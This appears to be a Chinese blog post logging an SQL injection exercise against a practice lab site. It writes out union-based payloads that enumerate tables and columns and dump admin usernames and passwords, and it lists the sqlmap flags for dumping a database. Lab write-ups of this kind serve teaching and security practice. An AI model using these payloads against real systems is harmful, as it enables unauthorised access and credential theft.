SQL注入案例

目录

一、简介

二、案例

1.发现注入点

2.寻找注入类型

3.寻找字段数

4.将传参值设为超出数据量的大值,联合查询找到回显位置

5.找到数据库

6.寻找库中的表

7.寻找表中列

8.查看表中数据

附:SQLMap注入

1.输入指令查数据库

2.输入指令查表

3.脱库查看账号密码


一、简介

记录SQL注入的案例练习

二、案例

http://pu2lh35s.ia.aqlab.cn/

1.发现注入点

2.寻找注入类型

,发现?id=1 and 1=1 符合

3.寻找字段数

发现字段数为2

4.将传参值设为超出数据量的大值,联合查询找到回显位置

5.找到数据库

6.寻找库中的表

?id=111111 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

7.寻找表中列

?id=111111 union select 1,group_concat(column_name) from information_schema.columns where table_name='admin'--+

8.查看表中数据

?id=111111 union select 1,group_concat(username,':',password) from admin--+

注:用 --+ 对结尾进行注释

附:SQLMap注入(sqlmap -u "x")

1.输入指令查数据库( --dbs)

2.输入指令查表( -D xx --tables)

3.脱库查看账号密码( -D xx -T xxx -C xxxx --dump)

相关推荐
八怪40 分钟前
KILL MTS的一个worker线程会怎么样
数据库
-Xie-1 小时前
Mysql杂志(三十一)——Join连接算法与子查询、排序优化
数据库·mysql
xiejava10182 小时前
开源安全管理平台wazuh-暴力破解检测与响应
安全·开源·wuzuh
程序新视界2 小时前
在连表查询场景下,MySQL隐式转换存在的坑
数据库·mysql·dba
九河云2 小时前
在云计算环境中实施有效的数据安全策略
大数据·网络·数据库·云计算
爱吃烤鸡翅的酸菜鱼3 小时前
从数据库直连到缓存预热:城市列表查询的性能优化全流程
java·数据库·后端·spring·个人开发
dualven_in_csdn4 小时前
ubuntu离线安装 xl2tpd
linux·数据库·ubuntu
初听于你5 小时前
高频面试题解析:算法到数据库全攻略
数据库·算法
毕设源码-郭学长9 小时前
【开题答辩全过程】以 安全培训信息管理平台为例,包含答辩的问题和答案
安全